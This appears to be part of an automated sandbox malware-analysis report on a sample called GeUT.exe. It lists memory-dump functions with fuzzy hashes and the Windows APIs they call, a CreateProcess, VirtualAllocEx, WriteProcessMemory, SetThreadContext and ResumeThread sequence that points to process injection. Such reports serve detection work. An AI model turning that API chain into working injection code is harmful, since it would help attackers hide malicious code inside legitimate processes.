Opcode Fuzzy Hash: 3379693a136a10ee2fc4caac2c1fac8e6b25410cde6e95b9f050297ddb45f698
Instruction Fuzzy Hash: 4B81C174C00269DFDB21CFA9D984BEDBBB5AB49300F1091AAE508B7250DB709A85CF54

Function 01877CDC Relevance: 1.7, APIs: 1, Instructions: 223
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000), ref: 01877EB9

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a418eec7c7a6d7f0c780b3335699545f3b3882759d5b1a4faadb43967809b895
Instruction ID: f4fba51065549c1298ecb7489825bc2d27ee3ec3eda4ce4767bb6f822cfd876f
Opcode Fuzzy Hash: a418eec7c7a6d7f0c780b3335699545f3b3882759d5b1a4faadb43967809b895
Instruction Fuzzy Hash: 3481C175C0022DDFDB21CFA9C984BEDBBB5AB49300F1091AAE508B7260DB709A85CF54

Function 01871BA8 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01871D79

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 85c0ffc17f8e127d4009e6c1993895c9827298ad5004b6d28ea99832da7efceb
Instruction ID: 0f677f0c4db3bc199a7c291a5664cade663d6a1297d74348bd649716b8cf2235
Opcode Fuzzy Hash: 85c0ffc17f8e127d4009e6c1993895c9827298ad5004b6d28ea99832da7efceb
Instruction Fuzzy Hash: 6281B175C00229DFDF21CFA9C984BDDBBB5BB49300F1491AAE508B7250DB709A89CF54

Function 01875C78 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01875E49

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: dea11526666f8d32b22339d58205b5193f1e4a606d074ea3f7a51397d117f9fd
Instruction ID: 562cd715053042dd90c3d3c7be1597d864d0ad496d88eda3c2e2abed31061718
Opcode Fuzzy Hash: dea11526666f8d32b22339d58205b5193f1e4a606d074ea3f7a51397d117f9fd
Instruction Fuzzy Hash: 1981BF75C00229DFDF21CFA9C980BEDBBB5BB49300F1091AAE509B7260DB709A85CF54

Function 01874E40 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 01875011

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: cf748e71808b269692c7dc2a113633ddd9ecce75fb0a233fa5b7388e306db57b
Instruction ID: 2760085df4095d9af53f7cad78e1b202e6aeab21b9e6af1b68fffeaad36a253f
Opcode Fuzzy Hash: cf748e71808b269692c7dc2a113633ddd9ecce75fb0a233fa5b7388e306db57b
Instruction Fuzzy Hash: 2481BF75C00269DFDF21CFA9C940BEDBBB5BB49300F1091AAE508B7260DB709A89CF54

Function 018721F0 Relevance: 1.6, APIs: 1, Instructions: 113
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 018722C6

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 00206ebd66e1c894dcf235037ae64583248b60f1ab28d6644e2406a6e6e1f197
Instruction ID: cf27147f83900aa6b184e89d0a2c498b4e42635e7567519c00d0ec8d6f498e85
Opcode Fuzzy Hash: 00206ebd66e1c894dcf235037ae64583248b60f1ab28d6644e2406a6e6e1f197
Instruction Fuzzy Hash: C04188B5D002589FCB10CFA9D984ADEFBF1BB49314F24902AE918B7210D374AA45CF64

Function 018721F8 Relevance: 1.6, APIs: 1, Instructions: 110injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 018722C6

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: ead596b87662bc4ba3043fcc3ddd4e85a4b8738e66fd31ac1719e54c1575d1a8
Instruction ID: 7e57f2832f59091380fbb75f1bba2ff0efaac8e0d7529cb9ee407e806bee1b62
Opcode Fuzzy Hash: ead596b87662bc4ba3043fcc3ddd4e85a4b8738e66fd31ac1719e54c1575d1a8
Instruction Fuzzy Hash: 7B4166B9D042589FCB10CFA9D984ADEFBF1BB49314F24902AE918B7210D375AA45CB64

Function 01871FD0 Relevance: 1.6, APIs: 1, Instructions: 102COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01872085

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 639fb87d58d4c1ccbe7b5c1c9d38b4e9233cf621260054586271dbf9d6b7a422
Instruction ID: 60ac8d9c0fdcfda39d8e4c382e889823634aaf1a23bdc79391fd5cbbc93e6d4f
Opcode Fuzzy Hash: 639fb87d58d4c1ccbe7b5c1c9d38b4e9233cf621260054586271dbf9d6b7a422
Instruction Fuzzy Hash: 104178B9D04258DFCF10CFA9D984ADEFBB1BB19310F10A06AE914B7210D375AA45CF64

Function 018720E8 Relevance: 1.6, APIs: 1, Instructions: 100memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01872195

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6d88f5f29754bdf270243aad0fb7baa4f999e9cf7ff2dbb0551e9c2a4cc203d3
Instruction ID: e62e93ae0db1c319f36ea0548bb9e309db5fd95ec26b5d5766436b96d9d55753
Opcode Fuzzy Hash: 6d88f5f29754bdf270243aad0fb7baa4f999e9cf7ff2dbb0551e9c2a4cc203d3
Instruction Fuzzy Hash: 9B3176B9D00258DFCF10CFA9E980ADEBBB1BB49310F10A02AE914B7210D335A946CF64

Function 01871FD8 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 01872085

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: b09e24f280e03302563238593f79f3d40e6f807e8cb9618c85f3e3f8577bfca0
Instruction ID: 93333e4b0807c51c3034bedeb357d341dc608944091f68576a5d75151c79b27a
Opcode Fuzzy Hash: b09e24f280e03302563238593f79f3d40e6f807e8cb9618c85f3e3f8577bfca0
Instruction Fuzzy Hash: 3E3187B9D04258DFCF10CFAAD984ADEFBB1BB19310F10A02AE914B7210D375AA45CF64

Function 018720F0 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 01872195

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: feb0779841cb956d11a92346ad82aae27b071935d9a78de552d8253d03261b9a
Instruction ID: 92237bfa6b65d62feda6b2ad0f85e6038a5d7dc288c78a48b9021568125007c7
Opcode Fuzzy Hash: feb0779841cb956d11a92346ad82aae27b071935d9a78de552d8253d03261b9a
Instruction Fuzzy Hash: 223154B9D04258DFCF10CFA9E984A9EFBB5BB19310F10A02AE914B7310D375A945CF65

Function 01871EC1 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 01871F72

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: aa3babea0792855a1791e601983560e9f2b0e2653978c9c6cf2f9cbd529c705b
Instruction ID: be1e82eb49ea8b72e62048a6b56f0c6ab84b79e5c870181a0ba4aabc2cdce454
Opcode Fuzzy Hash: aa3babea0792855a1791e601983560e9f2b0e2653978c9c6cf2f9cbd529c705b
Instruction Fuzzy Hash: 5131A8B5D012589FCB10CFAAD984ADEFBF1BB49314F24906AE418B7250D378AA45CF64

Function 01871EC8 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 01871F72

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 19151bf7c41047f290af5c4bfc037020ab4a06d5ce388a6746f25ffb57c006ac
Instruction ID: ffaa6a1d48aa06c2f138031227b31c33575d46eabdd78951698d06fb037167e1
Opcode Fuzzy Hash: 19151bf7c41047f290af5c4bfc037020ab4a06d5ce388a6746f25ffb57c006ac
Instruction Fuzzy Hash: E23198B5D012589FCB10CFAAD984ADEFBF1BB49314F24902AE418B7310D378AA45CF64

Function 01872331 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 018723AE

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 8fcc4e6fa382b3e02967cf77c3ffd1a7705a4b5678ade58b026b523df3be7c3f
Instruction ID: 0150de8fff7bf791081369f62b32c0692759e42a210d5ccf6509bbf3700d4265
Opcode Fuzzy Hash: 8fcc4e6fa382b3e02967cf77c3ffd1a7705a4b5678ade58b026b523df3be7c3f
Instruction Fuzzy Hash: C82199B9D002199FCB10CFA9D484ADEFBF4BB49324F24905AE914B7350D375A945CFA4

Function 01872338 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 018723AE

Memory Dump Source

Source File: 00000004.00000002.2254675820.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1870000_GeUT.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: db0c747cb13ef6125508b1b13c23358880add41a8a8956e4c3e48f11c82692f5
Instruction ID: c424b106e88aff07fc1d11b2d3f0bb2ccbfe2ed7967bca825d09d7f5abb240fc
Opcode Fuzzy Hash: db0c747cb13ef6125508b1b13c23358880add41a8a8956e4c3e48f11c82692f5
Instruction Fuzzy Hash: 3321A6B8D002089FCB10CFA9D484ADEFBF4BB09324F20905AE918B7310D375A945CFA4

Function 0181D5B8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254528394.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_181d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a433631db42865f87b669028eb20c1915479eacc5b8bf441738672bf4fa4b9d2
Instruction ID: 6fc14754805260fa2a1baf825140ba8ec5c100df108db54d47b23dea6706b6b3
Opcode Fuzzy Hash: a433631db42865f87b669028eb20c1915479eacc5b8bf441738672bf4fa4b9d2
Instruction Fuzzy Hash: 772128B3504204DFDB05DF54D9C8F26BF69FB84318F208A6DE90A8B25AC336D556CAE1

Function 0181D5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2254528394.000000000181D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0181D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_181d000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction ID: 4a7fd32292a3ccaa9d6eef062782301ad0043b80f7774c3984297b0e6cc81805
Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
Instruction Fuzzy Hash: 1B11B1B6504284CFCB16CF54D9C4B16BF71FB84314F24C6A9D8094B25BC33AD556CBA1

Analysis Process: GeUT.exePID: 4948, Parent PID: 3516COMMON

Executed Functions

Function 02E10D95 Relevance: .5, Instructions: 469COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f26ca4c7b5644407e4e8c419ed7782e08cc9ee09740a6b137c46fd5734ea3bc
Instruction ID: ff72253d5d09d42b4e09c3d75a57ec6af961a82468e618a90f249874c87fc80a
Opcode Fuzzy Hash: 2f26ca4c7b5644407e4e8c419ed7782e08cc9ee09740a6b137c46fd5734ea3bc
Instruction Fuzzy Hash: 145140386012418FDB19FB79EC5856E7FB7FB88211704AA3DD50687269EF789C16CB80

Function 02E11010 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d417f6827dd28982f0dabe16032834f18b60ef62fe1f8c7eaed0afeb97b70bf
Instruction ID: 16d1956f62762106c0a22b15c1e8e7d2f4cea63753f7fe455ba0d6be7c3d9f91
Opcode Fuzzy Hash: 5d417f6827dd28982f0dabe16032834f18b60ef62fe1f8c7eaed0afeb97b70bf
Instruction Fuzzy Hash: 15917D347002018FCB19EB79EC58A6E7BB3BB88211B14992DE506DB3A9DF749C15CB90

Function 02E11157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8321f30600ae4559fa2740b705106229b8c73e26fa8c693d7fe4d96509069a27
Instruction ID: 6cf4037383d7985615642f79f6c5a2b76a8162abfff7cf23fa13f405311bcc60
Opcode Fuzzy Hash: 8321f30600ae4559fa2740b705106229b8c73e26fa8c693d7fe4d96509069a27
Instruction Fuzzy Hash: B2318D31B006418BDB29AB79C81812E7AE3BFC52203149D3ED55B8B784DF74DC04CB91

Function 02E11860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad184fae1fb77744be6d55503786559f85bc915624915a3d19053527df113768
Instruction ID: d139cf48dd180a925a94b6c329752aeed803f706eff95c8fe460bd2768b1e5fe
Opcode Fuzzy Hash: ad184fae1fb77744be6d55503786559f85bc915624915a3d19053527df113768
Instruction Fuzzy Hash: 41219371B012059FDB44EBF9881836FBAEBEFC8311B14842ED54AD7385DE348C0187A5

Function 02E11750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d1bd652dfefc7872024986f719707e9c263d43773670ad1066d3734bfd36ea9
Instruction ID: 1d6712fe96728c9448fcbff1904efce283520ac66c2ca0728086699d5439af6b
Opcode Fuzzy Hash: 1d1bd652dfefc7872024986f719707e9c263d43773670ad1066d3734bfd36ea9
Instruction Fuzzy Hash: 40216D78E0021ADFDB45EBB9D8406AE7FB2FF88300F108669E505A7345EB706A51CF50

Function 02E10939 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d63f8db65cb9803910c70f3173dafeff156756e989ff52ba8bc20ce805681d10
Instruction ID: de05cfa83a9afed34491d746d39e925ac9855b3c91e3d1fd3d156933958b0153
Opcode Fuzzy Hash: d63f8db65cb9803910c70f3173dafeff156756e989ff52ba8bc20ce805681d10
Instruction Fuzzy Hash: F9218E30E012098FCB48EBB8D9553AE7BF1AF85310F148479D40AAB289DB705E41CB81

Function 02E10828 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98fef72a98a06b814cbb9c7231e167f321470fe611d225172eaf596fdd26ea5c
Instruction ID: 63c9923b3218494c55563dbf17084afa29c3ce4889d6b4d8fb33c25b7675ba53
Opcode Fuzzy Hash: 98fef72a98a06b814cbb9c7231e167f321470fe611d225172eaf596fdd26ea5c
Instruction Fuzzy Hash: 4921D138501267CFDB06FB29F980A453BB5FB89304B105B59A2049B519EBB86957CF80

Function 02E10848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2283119662.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2e10000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a4e832a991e1ed925c0690c46b2cbc2d8a2f20634cc53f1b65b39c6de648a28
Instruction ID: b828e2a64f4f21e2ca46c43f5b7b04161134c56e88b116c54a01b7fedf10099e
Opcode Fuzzy Hash: 2a4e832a991e1ed925c0690c46b2cbc2d8a2f20634cc53f1b65b39c6de648a28
Instruction Fuzzy Hash: 72119A3C501127CFDF06FB2AF8809453BB5FB88304710AB58A2049B61DEBB8795B8B80

Analysis Process: GeUT.exePID: 5916, Parent PID: 3516COMMON

Executed Functions

Function 011B0D95 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c282e29bf76ae356c341191e0746cc5cc77f575b5a0131286c18c163974ea04
Instruction ID: f985a0098bb18e5ee048fd392f2d7c6d92f0b3ddf8b30d9ab398cc5076bdf114
Opcode Fuzzy Hash: 7c282e29bf76ae356c341191e0746cc5cc77f575b5a0131286c18c163974ea04
Instruction Fuzzy Hash: 7D516374600645CFDB1AEF79E8585AD7FB6FB843013005A6CE046E7269EF749D09CB81

Function 011B1010 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cd5d29e5431c0359e3cb9cb570c9242fbd63c2889bbf9a892a997c478053cf7
Instruction ID: c4512c07f2e2acf57a6a99e96dd729b61d9ab3fd03f66903583d9181e37c37e4
Opcode Fuzzy Hash: 8cd5d29e5431c0359e3cb9cb570c9242fbd63c2889bbf9a892a997c478053cf7
Instruction Fuzzy Hash: 109190747002058FDB19EB79E858A6E7FB6FF88300B1045ACE146EB3A9DF749D058B81

Function 011B1157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3c81b771b5c3ba19471341a8565dd6219176e010a992f56f8772cdd3e53ca03
Instruction ID: 0c98c2325d862580c623fa94032e6c89fe41fdddbd1fdba28f5928036a007277
Opcode Fuzzy Hash: b3c81b771b5c3ba19471341a8565dd6219176e010a992f56f8772cdd3e53ca03
Instruction Fuzzy Hash: 8D31AD31B00B418BDB2AAB79981816E7EE2BFC9211300993DD157DB794DF74DD058BC2

Function 011B1860 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb4b5fcfc63bcf5f131ff7d91bc55be42c2eb7fe896eb365310d1d7990a9dae
Instruction ID: bc25c3273c12d5084069ae4852add3df1a92b8983b4cdf946c49f61261c8c3ca
Opcode Fuzzy Hash: 0eb4b5fcfc63bcf5f131ff7d91bc55be42c2eb7fe896eb365310d1d7990a9dae
Instruction Fuzzy Hash: D9219071B012459FDB44EBF9881836EBEEAEFC8310B14442DE54AD7356DE748D0147A1

Function 011B0939 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd9e9c309aa6ba8ff9339d86ac53e4bc1ccd6a8ae45076ffdffcf5aa6179e5d
Instruction ID: c50c7d86b3950c8d808c2d2f3a0e7e8f0460ab2b933122b1050fc72564bd8eb0
Opcode Fuzzy Hash: 4fd9e9c309aa6ba8ff9339d86ac53e4bc1ccd6a8ae45076ffdffcf5aa6179e5d
Instruction Fuzzy Hash: FF21CF30A05248CFDB49EBB8D8552AE7BF1EF89310F1044A9E809EB295EB705D14CB91

Function 011B1750 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d8747f77dec85abb7862502dc5871a7a4060459966b9edf2f50d9be78f9b82c
Instruction ID: 46f401b022294a52f8f098cbe3404db196791fe13d0acf6883ec38680a042844
Opcode Fuzzy Hash: 3d8747f77dec85abb7862502dc5871a7a4060459966b9edf2f50d9be78f9b82c
Instruction Fuzzy Hash: E8217C74A0020ADFDB45EBB8D8406AEBFB6FFC8304F1046A9D105A7359EBB06A40CB50

Function 011B0828 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 131c6902fc61083107393ca4b2c2c47937e4e0042e8b766adaa45670f26ef688
Instruction ID: d17d2d0c495dece2835c090744251313631a2730bed1e91692d0dd78c9f02669
Opcode Fuzzy Hash: 131c6902fc61083107393ca4b2c2c47937e4e0042e8b766adaa45670f26ef688
Instruction Fuzzy Hash: 8121DA74505A46DFDB06EB28F8809857FB9FB857047006ADDD1049B22EDAB46A0ACB80

Function 011B0848 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2285429549.00000000011B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11b0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16ae920e379441b9b3fb620366e0f61727922bff1b813587d4708aaa14e40493
Instruction ID: 2fda607ec7792dfc71bee07af1389e7377359fe24ad3109b624b5caa01a5cc14
Opcode Fuzzy Hash: 16ae920e379441b9b3fb620366e0f61727922bff1b813587d4708aaa14e40493
Instruction Fuzzy Hash: B1117A74501A46DFDB06FF18F980A857FAEF7C4704B00AADC91049B22DDAF46A0A8F80

Analysis Process: GeUT.exePID: 5156, Parent PID: 3516COMMON

Executed Functions

Function 00FA0D95 Relevance: .5, Instructions: 470COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 862a20bb6d0b1dd7cdaa5284546546940eb64c3a4f45e2fb220738fc06b2f3f8
Instruction ID: 8e9f4eee69e91e38c66029e128a26770621cd606a1588009c25bb0859cf06268
Opcode Fuzzy Hash: 862a20bb6d0b1dd7cdaa5284546546940eb64c3a4f45e2fb220738fc06b2f3f8
Instruction Fuzzy Hash: AD513E74A0424A8FDB05BF78E85896E7FF2BB893017005A6DD106CB2A5EF74AD05DB81

Function 00FA1010 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f26a31d2a685af71b833fff1e2c3d5aaeabc1b2b46d3dcbcd2fa1c2d3d364b41
Instruction ID: 1947bd76d6dc7b274a927d294e690267749309079276802ea07a7c338d332f56
Opcode Fuzzy Hash: f26a31d2a685af71b833fff1e2c3d5aaeabc1b2b46d3dcbcd2fa1c2d3d364b41
Instruction Fuzzy Hash: 9D915D34B0024A8FDB05AF78E858A6E7FF2BF89301B10556DE106DB3A5EF749C059B81

Function 00FA1157 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2286518106.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_fa0000_GeUT.jbxd

